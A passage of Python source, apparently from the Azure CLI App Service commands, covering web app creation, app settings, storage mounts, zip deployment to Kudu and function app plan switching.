raise MutuallyExclusiveArgumentError('usage error: --deployment-source-url <url> | --deployment-local-git')
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
client = web_client_factory(cmd.cli_ctx)
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(name=plan, resource_group_name=resource_group_name)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist in the resource group '{}".format(plan, resource_group_name))
is_linux = plan_info.reserved
node_default_version = NODE_EXACT_VERSION_DEFAULT
location = plan_info.location
# This is to keep the existing appsettings for a newly created webapp on existing webapp name.
name_validation = get_site_availability(cmd, name)
if not name_validation.name_available:
if name_validation.reason == 'Invalid':
raise CLIError(name_validation.message)
logger.warning("Webapp '%s' already exists. The command will use the existing app's settings.", name)
app_details = get_app_details(cmd, name)
if app_details is None:
raise CLIError("Unable to retrieve details of the existing app '{}'. Please check that "
"the app is a part of the current subscription".format(name))
current_rg = app_details.resource_group
if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()):
raise CLIError("The webapp '{}' exists in resource group '{}' and does not "
"match the value entered '{}'. Please re-run command with the "
"correct parameters.". format(name, current_rg, resource_group_name))
existing_app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name,
name, 'list_application_settings')
settings = []
for k, v in existing_app_settings.properties.items():
settings.append(NameValuePair(name=k, value=v))
site_config = SiteConfig(app_settings=settings)
else:
site_config = SiteConfig(app_settings=[])
if isinstance(plan_info.sku, SkuDescription) and plan_info.sku.name.upper() not in ['F1', 'FREE', 'SHARED', 'D1',
'B1', 'B2', 'B3', 'BASIC']:
site_config.always_on = True
if subnet or vnet:
subnet_info = _get_subnet_info(cmd=cmd,
resource_group_name=resource_group_name,
subnet=subnet,
vnet=vnet)
_validate_vnet_integration_location(cmd=cmd, webapp_location=plan_info.location,
subnet_resource_group=subnet_info["resource_group_name"],
vnet_name=subnet_info["vnet_name"],
vnet_sub_id=subnet_info["subnet_subscription_id"])
_vnet_delegation_check(cmd, subnet_subscription_id=subnet_info["subnet_subscription_id"],
vnet_resource_group=subnet_info["resource_group_name"],
vnet_name=subnet_info["vnet_name"],
subnet_name=subnet_info["subnet_name"])
site_config.vnet_route_all_enabled = True
subnet_resource_id = subnet_info["subnet_resource_id"]
else:
subnet_resource_id = None
webapp_def = Site(location=location, site_config=site_config, server_farm_id=plan_info.id, tags=tags,
https_only=using_webapp_up, virtual_network_subnet_id=subnet_resource_id)
helper = _StackRuntimeHelper(cmd, client, linux=is_linux)
if runtime:
runtime = helper.remove_delimiters(runtime)
current_stack = None
if is_linux:
if not validate_container_app_create_options(runtime, deployment_container_image_name,
multicontainer_config_type, multicontainer_config_file):
raise CLIError("usage error: --runtime | --deployment-container-image-name |"
" --multicontainer-config-type TYPE --multicontainer-config-file FILE")
if startup_file:
site_config.app_command_line = startup_file
if runtime:
match = helper.resolve(runtime)
if not match:
raise CLIError("Linux Runtime '{}' is not supported."
" Please invoke 'az webapp list-runtimes --linux' to cross check".format(runtime))
match['setter'](cmd=cmd, stack=match, site_config=site_config)
elif deployment_container_image_name:
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name="WEBSITES_ENABLE_APP_SERVICE_STORAGE",
value="false"))
elif multicontainer_config_type and multicontainer_config_file:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
site_config.linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
elif plan_info.is_xenon: # windows container webapp
if deployment_container_image_name:
site_config.windows_fx_version = _format_fx_version(deployment_container_image_name)
# set the needed app settings for container image validation
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_USERNAME",
value=docker_registry_server_user))
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_PASSWORD",
value=docker_registry_server_password))
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_URL",
value=docker_registry_server_url))
elif runtime: # windows webapp with runtime specified
if any([startup_file, deployment_container_image_name, multicontainer_config_file, multicontainer_config_type]):
raise CLIError("usage error: --startup-file or --deployment-container-image-name or "
"--multicontainer-config-type and --multicontainer-config-file is "
"only appliable on linux webapp")
match = helper.resolve(runtime)
if not match:
raise CLIError("Windows runtime '{}' is not supported. "
"Please invoke 'az webapp list-runtimes' to cross check".format(runtime))
match['setter'](cmd=cmd, stack=match, site_config=site_config)
# TODO: Ask Calvin the purpose of this - seems like an unneeded set of calls
# portal uses the current_stack property in metadata to display the stack for windows apps
current_stack = get_current_stack_from_runtime(runtime)
else: # windows webapp without runtime specified
if name_validation.name_available: # If creating new webapp
site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION",
value=node_default_version))
if site_config.app_settings:
for setting in site_config.app_settings:
logger.info('Will set appsetting %s', setting)
if using_webapp_up: # when the routine is invoked as a help method for webapp up
if name_validation.name_available:
logger.info("will set appsetting for enabling build")
site_config.app_settings.append(NameValuePair(name="SCM_DO_BUILD_DURING_DEPLOYMENT", value=True))
if language is not None and language.lower() == 'dotnetcore':
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name='ANCM_ADDITIONAL_ERROR_PAGE_LINK',
value='https://{}.scm.azurewebsites.net/detectors'
.format(name)))
poller = client.web_apps.begin_create_or_update(resource_group_name, name, webapp_def)
webapp = LongRunningOperation(cmd.cli_ctx)(poller)
# TODO: (Check with Calvin) This seems to be something specific to portal client use only and should be removed
if current_stack:
_update_webapp_current_stack_property_if_needed(cmd, resource_group_name, name, current_stack)
# Ensure SCC operations follow right after the 'create', with no preceding appsetting update commands
_set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
_fill_ftp_publishing_url(cmd, webapp, resource_group_name, name)
if deployment_container_image_name:
logger.info("Updating container settings")
update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
deployment_container_image_name, docker_registry_server_user,
docker_registry_server_password=docker_registry_server_password)
if assign_identities is not None:
identity = assign_identity(cmd, resource_group_name, name, assign_identities,
role, None, scope)
webapp.identity = identity
return webapp
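# For orientation: this routine backs `az webapp create`. A typical invocation
# looks like the following sketch (hypothetical resource names):
#   az webapp create --resource-group MyRG --plan MyPlan --name my-unique-app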
def _validate_vnet_integration_location(cmd, subnet_resource_group, vnet_name, webapp_location, vnet_sub_id=None):
from azure.cli.core.commands.client_factory import get_subscription_id
current_sub_id = get_subscription_id(cmd.cli_ctx)
if vnet_sub_id:
cmd.cli_ctx.data['subscription_id'] = vnet_sub_id
vnet_client = network_client_factory(cmd.cli_ctx).virtual_networks
vnet_location = vnet_client.get(resource_group_name=subnet_resource_group,
virtual_network_name=vnet_name).location
cmd.cli_ctx.data['subscription_id'] = current_sub_id
vnet_location = _normalize_location(cmd, vnet_location)
asp_location = _normalize_location(cmd, webapp_location)
if vnet_location != asp_location:
raise ArgumentUsageError("Unable to create webapp: vnet and App Service Plan must be in the same location. "
"vnet location: {}. Plan location: {}.".format(vnet_location, asp_location))
def _get_subnet_info(cmd, resource_group_name, vnet, subnet):
from azure.cli.core.commands.client_factory import get_subscription_id
subnet_info = {"vnet_name": None,
"subnet_name": None,
"resource_group_name": None,
"subnet_resource_id": None,
"subnet_subscription_id": None,
"vnet_resource_id": None}
if is_valid_resource_id(subnet):
if vnet:
logger.warning("--subnet argument is a resource ID. Ignoring --vnet argument.")
parsed_sub_rid = parse_resource_id(subnet)
subnet_info["vnet_name"] = parsed_sub_rid["name"]
subnet_info["subnet_name"] = parsed_sub_rid["resource_name"]
subnet_info["resource_group_name"] = parsed_sub_rid["resource_group"]
subnet_info["subnet_resource_id"] = subnet
subnet_info["subnet_subscription_id"] = parsed_sub_rid["subscription"]
vnet_fmt = "/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/virtualNetworks/{}"
subnet_info["vnet_resource_id"] = vnet_fmt.format(parsed_sub_rid["subscription"],
parsed_sub_rid["resource_group"],
parsed_sub_rid["name"])
return subnet_info
subnet_name = subnet
if is_valid_resource_id(vnet):
parsed_vnet = parse_resource_id(vnet)
subnet_rg = parsed_vnet["resource_group"]
vnet_name = parsed_vnet["name"]
subscription_id = parsed_vnet["subscription"]
subnet_info["vnet_resource_id"] = vnet
else:
logger.warning("Assuming subnet resource group is the same as webapp. "
"Use a resource ID for --subnet or --vnet to use a different resource group.")
subnet_rg = resource_group_name
vnet_name = vnet
subscription_id = get_subscription_id(cmd.cli_ctx)
vnet_fmt = "/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/virtualNetworks/{}"
subnet_info["vnet_resource_id"] = vnet_fmt.format(subscription_id,
subnet_rg,
vnet)
subnet_id_fmt = "/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/virtualNetworks/{}/subnets/{}"
subnet_rid = subnet_id_fmt.format(subscription_id, subnet_rg, vnet_name, subnet_name)
subnet_info["vnet_name"] = vnet_name
subnet_info["subnet_name"] = subnet_name
subnet_info["resource_group_name"] = subnet_rg
subnet_info["subnet_resource_id"] = subnet_rid
subnet_info["subnet_subscription_id"] = subscription_id
return subnet_info
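# For reference, the assembled subnet resource ID has this shape (hypothetical names):
#   /subscriptions/<sub-id>/resourceGroups/MyRG/providers/Microsoft.Network/virtualNetworks/MyVnet/subnets/MySubnet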
def validate_container_app_create_options(runtime=None, deployment_container_image_name=None,
multicontainer_config_type=None, multicontainer_config_file=None):
if bool(multicontainer_config_type) != bool(multicontainer_config_file):
return False
opts = [runtime, deployment_container_image_name, multicontainer_config_type]
return len([x for x in opts if x]) == 1 # you can only specify one of the combinations
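# A short sketch of the accepted combinations (hypothetical values):
#   validate_container_app_create_options(runtime="python|3.9")                      -> True
#   validate_container_app_create_options(deployment_container_image_name="nginx")  -> True
#   validate_container_app_create_options(multicontainer_config_type="COMPOSE",
#                                         multicontainer_config_file="compose.yml") -> True
#   validate_container_app_create_options(runtime="python|3.9",
#                                         deployment_container_image_name="nginx")  -> False
#   validate_container_app_create_options(multicontainer_config_type="COMPOSE")     -> False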
def parse_docker_image_name(deployment_container_image_name):
if not deployment_container_image_name:
return None
non_url = "/" not in deployment_container_image_name
non_url = non_url or ("." not in deployment_container_image_name and ":" not in deployment_container_image_name)
if non_url:
return None
parsed_url = urlparse(deployment_container_image_name)
if parsed_url.scheme:
return parsed_url.hostname
hostname = urlparse("https://{}".format(deployment_container_image_name)).hostname
return "https://{}".format(hostname)
def update_app_settings(cmd, resource_group_name, name, settings=None, slot=None, slot_settings=None):
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_application_settings', slot)
result, slot_result = {}, {}
# pylint: disable=too-many-nested-blocks
for src, dest, setting_type in [(settings, result, "Settings"), (slot_settings, slot_result, "SlotSettings")]:
for s in src:
try:
temp = shell_safe_json_parse(s)
if isinstance(temp, list): # a bit messy, but we'd like to accept the output of the "list" command
for t in temp:
if 'slotSetting' in t.keys():
slot_result[t['name']] = t['slotSetting']
if setting_type == "SlotSettings":
slot_result[t['name']] = True
result[t['name']] = t['value']
else:
dest.update(temp)
except CLIError:
setting_name, value = s.split('=', 1)
dest[setting_name] = value
result.update(dest)
for setting_name, value in result.items():
app_settings.properties[setting_name] = value
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings, slot, client)
app_settings_slot_cfg_names = []
if slot_result:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.app_setting_names = slot_cfg_names.app_setting_names or []
# Slot settings logic to add a new setting(s) or remove an existing setting(s)
for slot_setting_name, value in slot_result.items():
if value and slot_setting_name not in slot_cfg_names.app_setting_names:
slot_cfg_names.app_setting_names.append(slot_setting_name)
elif not value and slot_setting_name in slot_cfg_names.app_setting_names:
slot_cfg_names.app_setting_names.remove(slot_setting_name)
app_settings_slot_cfg_names = slot_cfg_names.app_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _build_app_settings_output(result.properties, app_settings_slot_cfg_names)
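# Accepted forms for `settings` / `slot_settings` (hypothetical values):
#   KEY=VALUE pairs:  ["WEBSITE_TIME_ZONE=UTC"]
#   or the JSON produced by the corresponding `list` command:
#     ['[{"name": "KEY", "value": "v", "slotSetting": false}]']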
def add_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type, account_name,
share_name, access_key, mount_path=None, slot=None, slot_setting=False):
AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
if custom_id in azure_storage_accounts.properties:
raise CLIError("Site already configured with an Azure storage account with the id '{}'. "
"Use 'az webapp config storage-account update' to update an existing "
"Azure storage account configuration.".format(custom_id))
azure_storage_accounts.properties[custom_id] = AzureStorageInfoValue(type=storage_type, account_name=account_name,
share_name=share_name, access_key=access_key,
mount_path=mount_path)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def update_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type=None, account_name=None,
share_name=None, access_key=None, mount_path=None, slot=None, slot_setting=False):
AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
existing_account_config = azure_storage_accounts.properties.pop(custom_id, None)
if not existing_account_config:
raise CLIError("No Azure storage account configuration found with the id '{}'. "
"Use 'az webapp config storage-account add' to add a new "
"Azure storage account configuration.".format(custom_id))
new_account_config = AzureStorageInfoValue(
type=storage_type or existing_account_config.type,
account_name=account_name or existing_account_config.account_name,
share_name=share_name or existing_account_config.share_name,
access_key=access_key or existing_account_config.access_key,
mount_path=mount_path or existing_account_config.mount_path
)
azure_storage_accounts.properties[custom_id] = new_account_config
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def enable_zip_deploy_functionapp(cmd, resource_group_name, name, src, build_remote=False, timeout=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
app = client.web_apps.get(resource_group_name, name)
if app is None:
raise CLIError('The function app \'{}\' was not found in resource group \'{}\'. '
'Please make sure these values are correct.'.format(name, resource_group_name))
parse_plan_id = parse_resource_id(app.server_farm_id)
plan_info = None
retry_delay = 10 # seconds
# We need to retry getting the plan because sometimes, when the plan is created as part
# of the function app, it can take a couple of tries before the plan becomes available
for _ in range(5):
plan_info = client.app_service_plans.get(parse_plan_id['resource_group'],
parse_plan_id['name'])
if plan_info is not None:
break
time.sleep(retry_delay)
is_consumption = is_plan_consumption(cmd, plan_info)
if (not build_remote) and is_consumption and app.reserved:
return upload_zip_to_storage(cmd, resource_group_name, name, src, slot)
if build_remote and app.reserved:
add_remote_build_app_settings(cmd, resource_group_name, name, slot)
elif app.reserved:
remove_remote_build_app_settings(cmd, resource_group_name, name, slot)
return enable_zip_deploy(cmd, resource_group_name, name, src, timeout, slot)
def enable_zip_deploy_webapp(cmd, resource_group_name, name, src, timeout=None, slot=None):
return enable_zip_deploy(cmd, resource_group_name, name, src, timeout=timeout, slot=slot)
def enable_zip_deploy(cmd, resource_group_name, name, src, timeout=None, slot=None):
logger.warning("Getting scm site credentials for zip deployment")
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
try:
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
except ValueError:
raise CLIError('Failed to fetch scm url for function app')
zip_url = scm_url + '/api/zipdeploy?isAsync=true'
deployment_status_url = scm_url + '/api/deployments/latest'
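# For reference, the same deployment can be triggered directly against the Kudu
# endpoint built above (a sketch; substitute real credentials and app name):
#   curl -X POST -u '<user>:<password>' --data-binary @src.zip \
#       'https://<app>.scm.azurewebsites.net/api/zipdeploy?isAsync=true'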
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
headers = authorization
headers['Content-Type'] = 'application/octet-stream'
headers['Cache-Control'] = 'no-cache'
headers['User-Agent'] = get_az_user_agent()
import requests
import os
from azure.cli.core.util import should_disable_connection_verify
# Read file content
with open(os.path.realpath(os.path.expanduser(src)), 'rb') as fs:
zip_content = fs.read()
logger.warning("Starting zip deployment. This operation can take a while to complete ...")
res = requests.post(zip_url, data=zip_content, headers=headers, verify=not should_disable_connection_verify())
logger.warning("Deployment endpoint responded with status code %d", res.status_code)
# check the status of async deployment
if res.status_code == 202:
response = _check_zip_deployment_status(cmd, resource_group_name, name, deployment_status_url,
authorization, timeout)
return response
# check if there's an ongoing process
if res.status_code == 409:
raise UnclassifiedUserFault("There may be an ongoing deployment or your app setting has "
"WEBSITE_RUN_FROM_PACKAGE. Please track your deployment in {} and ensure the "
"WEBSITE_RUN_FROM_PACKAGE app setting is removed. Use 'az webapp config "
"appsettings list --name MyWebapp --resource-group MyResourceGroup --subscription "
"MySubscription' to list app settings and 'az webapp config appsettings delete "
"--name MyWebApp --resource-group MyResourceGroup --setting-names <setting-names> "
"to delete them.".format(deployment_status_url))
# any other status code indicates an error occurred during deployment
if res.status_code:
raise AzureInternalError("An error occurred during deployment. Status Code: {}, Details: {}"
.format(res.status_code, res.text))
def add_remote_build_app_settings(cmd, resource_group_name, name, slot):
settings = get_app_settings(cmd, resource_group_name, name, slot)
scm_do_build_during_deployment = None
website_run_from_package = None
enable_oryx_build = None
app_settings_should_not_have = []
app_settings_should_contain = {}
for keyval in settings:
value = keyval['value'].lower()
if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
scm_do_build_during_deployment = value in ('true', '1')
if keyval['name'] == 'WEBSITE_RUN_FROM_PACKAGE':
website_run_from_package = value
if keyval['name'] == 'ENABLE_ORYX_BUILD':
enable_oryx_build = value
if scm_do_build_during_deployment is not True:
logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to true")
update_app_settings(cmd, resource_group_name, name, [
"SCM_DO_BUILD_DURING_DEPLOYMENT=true"
], slot)
app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'true'
if website_run_from_package:
logger.warning("Removing WEBSITE_RUN_FROM_PACKAGE app setting")
delete_app_settings(cmd, resource_group_name, name, [
"WEBSITE_RUN_FROM_PACKAGE"
], slot)
app_settings_should_not_have.append('WEBSITE_RUN_FROM_PACKAGE')
if enable_oryx_build:
logger.warning("Removing ENABLE_ORYX_BUILD app setting")
delete_app_settings(cmd, resource_group_name, name, [
"ENABLE_ORYX_BUILD"
], slot)
app_settings_should_not_have.append('ENABLE_ORYX_BUILD')
# Wait for scm site to get the latest app settings
if app_settings_should_not_have or app_settings_should_contain:
logger.warning("Waiting SCM site to be updated with the latest app settings")
scm_is_up_to_date = False
retries = 10
while not scm_is_up_to_date and retries >= 0:
scm_is_up_to_date = validate_app_settings_in_scm(
cmd, resource_group_name, name, slot,
should_contain=app_settings_should_contain,
should_not_have=app_settings_should_not_have)
retries -= 1
time.sleep(5)
if retries < 0:
logger.warning("App settings may not be propagated to the SCM site.")
def remove_remote_build_app_settings(cmd, resource_group_name, name, slot):
settings = get_app_settings(cmd, resource_group_name, name, slot)
scm_do_build_during_deployment = None
app_settings_should_contain = {}
for keyval in settings:
value = keyval['value'].lower()
if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
scm_do_build_during_deployment = value in ('true', '1')
if scm_do_build_during_deployment is not False:
logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to false")
update_app_settings(cmd, resource_group_name, name, [
"SCM_DO_BUILD_DURING_DEPLOYMENT=false"
], slot)
app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'false'
# Wait for scm site to get the latest app settings
if app_settings_should_contain:
logger.warning("Waiting SCM site to be updated with the latest app settings")
scm_is_up_to_date = False
retries = 10
while not scm_is_up_to_date and retries >= 0:
scm_is_up_to_date = validate_app_settings_in_scm(
cmd, resource_group_name, name, slot,
should_contain=app_settings_should_contain)
retries -= 1
time.sleep(5)
if retries < 0:
logger.warning("App settings may not be propagated to the SCM site")
def upload_zip_to_storage(cmd, resource_group_name, name, src, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
storage_connection = None
for keyval in settings:
if keyval['name'] == 'AzureWebJobsStorage':
storage_connection = str(keyval['value'])
if storage_connection is None:
        raise CLIError('Could not find an \'AzureWebJobsStorage\' application setting')
container_name = "function-releases"
blob_name = "{}-{}.zip".format(datetime.datetime.today().strftime('%Y%m%d%H%M%S'), str(uuid.uuid4()))
BlockBlobService = get_sdk(cmd.cli_ctx, ResourceType.DATA_STORAGE, 'blob#BlockBlobService')
block_blob_service = BlockBlobService(connection_string=storage_connection)
if not block_blob_service.exists(container_name):
block_blob_service.create_container(container_name)
# https://gist.github.com/vladignatyev/06860ec2040cb497f0f3
def progress_callback(current, total):
total_length = 30
        filled_length = int(round(total_length * current / float(total)))
percents = round(100.0 * current / float(total), 1)
progress_bar = '=' * filled_length + '-' * (total_length - filled_length)
progress_message = 'Uploading {} {}%'.format(progress_bar, percents)
cmd.cli_ctx.get_progress_controller().add(message=progress_message)
block_blob_service.create_blob_from_path(container_name, blob_name, src, validate_content=True,
progress_callback=progress_callback)
now = datetime.datetime.utcnow()
blob_start = now - datetime.timedelta(minutes=10)
blob_end = now + datetime.timedelta(weeks=520)
BlobPermissions = get_sdk(cmd.cli_ctx, ResourceType.DATA_STORAGE, 'blob#BlobPermissions')
blob_token = block_blob_service.generate_blob_shared_access_signature(container_name,
blob_name,
permission=BlobPermissions(read=True),
expiry=blob_end,
start=blob_start)
blob_uri = block_blob_service.make_blob_url(container_name, blob_name, sas_token=blob_token)
website_run_from_setting = "WEBSITE_RUN_FROM_PACKAGE={}".format(blob_uri)
update_app_settings(cmd, resource_group_name, name, settings=[website_run_from_setting])
client = web_client_factory(cmd.cli_ctx)
try:
logger.info('\nSyncing Triggers...')
if slot is not None:
client.web_apps.sync_function_triggers_slot(resource_group_name, name, slot)
else:
client.web_apps.sync_function_triggers(resource_group_name, name)
except CloudError as ex:
# This SDK function throws an error if Status Code is 200
if ex.status_code != 200:
raise ex
except Exception as ex: # pylint: disable=broad-except
if ex.response.status_code != 200:
raise ex
def show_webapp(cmd, resource_group_name, name, slot=None):
return _show_app(cmd, resource_group_name, name, "webapp", slot)
# for generic updater
def get_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def set_webapp(cmd, resource_group_name, name, slot=None, skip_dns_registration=None, # pylint: disable=unused-argument
skip_custom_domain_verification=None, force_dns_registration=None, ttl_in_seconds=None, **kwargs): # pylint: disable=unused-argument
instance = kwargs['parameters']
client = web_client_factory(cmd.cli_ctx)
updater = client.web_apps.begin_create_or_update_slot if slot else client.web_apps.begin_create_or_update
kwargs = dict(resource_group_name=resource_group_name, name=name, site_envelope=instance)
if slot:
kwargs['slot'] = slot
return updater(**kwargs)
def update_webapp(cmd, instance, client_affinity_enabled=None, https_only=None, minimum_elastic_instance_count=None,
prewarmed_instance_count=None):
if 'function' in instance.kind:
raise ValidationError("please use 'az functionapp update' to update this function app")
if minimum_elastic_instance_count or prewarmed_instance_count:
args = ["--minimum-elastic-instance-count", "--prewarmed-instance-count"]
plan = get_app_service_plan_from_webapp(cmd, instance, api_version="2021-01-15")
sku = _normalize_sku(plan.sku.name)
if get_sku_tier(sku) not in ["PREMIUMV2", "PREMIUMV3"]:
raise ValidationError("{} are only supported for elastic premium V2/V3 SKUs".format(str(args)))
if not plan.elastic_scale_enabled:
raise ValidationError("Elastic scale is not enabled on the App Service Plan. Please update the plan ")
if (minimum_elastic_instance_count or 0) > plan.maximum_elastic_worker_count:
raise ValidationError("--minimum-elastic-instance-count: Minimum elastic instance count is greater than "
"the app service plan's maximum Elastic worker count. "
"Please choose a lower count or update the plan's maximum ")
if (prewarmed_instance_count or 0) > plan.maximum_elastic_worker_count:
raise ValidationError("--prewarmed-instance-count: Prewarmed instance count is greater than "
"the app service plan's maximum Elastic worker count. "
"Please choose a lower count or update the plan's maximum ")
if client_affinity_enabled is not None:
instance.client_affinity_enabled = client_affinity_enabled == 'true'
if https_only is not None:
instance.https_only = https_only == 'true'
if minimum_elastic_instance_count is not None:
from azure.mgmt.web.models import SiteConfig
# Need to create a new SiteConfig object to ensure that the new property is included in request body
conf = SiteConfig(**instance.site_config.as_dict())
conf.minimum_elastic_instance_count = minimum_elastic_instance_count
instance.site_config = conf
if prewarmed_instance_count is not None:
instance.site_config.pre_warmed_instance_count = prewarmed_instance_count
return instance
def update_functionapp(cmd, instance, plan=None, force=False):
client = web_client_factory(cmd.cli_ctx)
if plan is not None:
if is_valid_resource_id(plan):
dest_parse_result = parse_resource_id(plan)
dest_plan_info = client.app_service_plans.get(dest_parse_result['resource_group'],
dest_parse_result['name'])
else:
dest_plan_info = client.app_service_plans.get(instance.resource_group, plan)
if dest_plan_info is None:
raise ResourceNotFoundError("The plan '{}' doesn't exist".format(plan))
validate_plan_switch_compatibility(cmd, client, instance, dest_plan_info, force)
instance.server_farm_id = dest_plan_info.id
return instance
def validate_plan_switch_compatibility(cmd, client, src_functionapp_instance, dest_plan_instance, force):
general_switch_msg = 'Currently the switch is only allowed between a Consumption or an Elastic Premium plan.'
src_parse_result = parse_resource_id(src_functionapp_instance.server_farm_id)
src_plan_info = client.app_service_plans.get(src_parse_result['resource_group'],
src_parse_result['name'])
if src_plan_info is None:
raise ResourceNotFoundError('Could not determine the current plan of the functionapp')
# Ensure all plans involved are windows. Reserved = true indicates Linux.
if src_plan_info.reserved or dest_plan_instance.reserved:
        raise ValidationError('This feature currently supports Windows-to-Windows plan migrations. For other '
                              'migrations, please redeploy.')
src_is_premium = is_plan_elastic_premium(cmd, src_plan_info)
dest_is_consumption = is_plan_consumption(cmd, dest_plan_instance)
if not (is_plan_consumption(cmd, src_plan_info) or src_is_premium):
raise ValidationError('Your functionapp is not using a Consumption or an Elastic Premium plan. ' +
general_switch_msg)
if not (dest_is_consumption or is_plan_elastic_premium(cmd, dest_plan_instance)):
raise ValidationError('You are trying to move to a plan that is not a Consumption or an '
'Elastic Premium plan. ' +
general_switch_msg)
if src_is_premium and dest_is_consumption:
logger.warning('WARNING: Moving a functionapp from Premium to Consumption might result in loss of '
'functionality and cause the app to break. Please ensure the functionapp is compatible '
'with a Consumption plan and is not using any features only available in Premium.')
if not force:
raise RequiredArgumentMissingError('If you want to migrate a functionapp from a Premium to Consumption '
'plan, please re-run this command with the \'--force\' flag.')
def set_functionapp(cmd, resource_group_name, name, **kwargs):
instance = kwargs['parameters']
client = web_client_factory(cmd.cli_ctx)
return client.web_apps.begin_create_or_update(resource_group_name, name, site_envelope=instance)
def get_functionapp(cmd, resource_group_name, name, slot=None):
function_app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not function_app or 'function' not in function_app.kind:
raise ResourceNotFoundError("Unable to find App {} in resource group {}".format(name, resource_group_name))
return function_app
def show_functionapp(cmd, resource_group_name, name, slot=None):
return _show_app(cmd, resource_group_name, name, 'functionapp', slot)
def list_webapp(cmd, resource_group_name=None):
full_list = _list_app(cmd.cli_ctx, resource_group_name)
    # filter out apps with kind==null as well as function apps
return list(filter(lambda x: x.kind is not None and "function" not in x.kind.lower(), full_list))
def list_deleted_webapp(cmd, resource_group_name=None, name=None, slot=None):
result = _list_deleted_app(cmd.cli_ctx, resource_group_name, name, slot)
return sorted(result, key=lambda site: site.deleted_site_id)
def restore_deleted_webapp(cmd, deleted_id, resource_group_name, name, slot=None, restore_content_only=None):
DeletedAppRestoreRequest = cmd.get_models('DeletedAppRestoreRequest')
request = DeletedAppRestoreRequest(deleted_site_id=deleted_id, recover_configuration=not restore_content_only)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'begin_restore_from_deleted_app',
slot, request)
def list_function_app(cmd, resource_group_name=None):
return list(filter(lambda x: x.kind is not None and "function" in x.kind.lower(),
_list_app(cmd.cli_ctx, resource_group_name)))
def _show_app(cmd, resource_group_name, name, cmd_app_type, slot=None):
app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not app:
raise ResourceNotFoundError("Unable to find {} '{}', in RG '{}'.".format(
cmd_app_type, name, resource_group_name))
app_type = _kind_to_app_type(app.kind) if app else None
if app_type != cmd_app_type:
raise ResourceNotFoundError(
"Unable to find {app_type} '{name}', in resource group '{resource_group}'".format(
app_type=cmd_app_type, name=name, resource_group=resource_group_name),
"Use 'az {app_type} show' to show {app_type}s".format(app_type=app_type))
app.site_config = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_configuration',
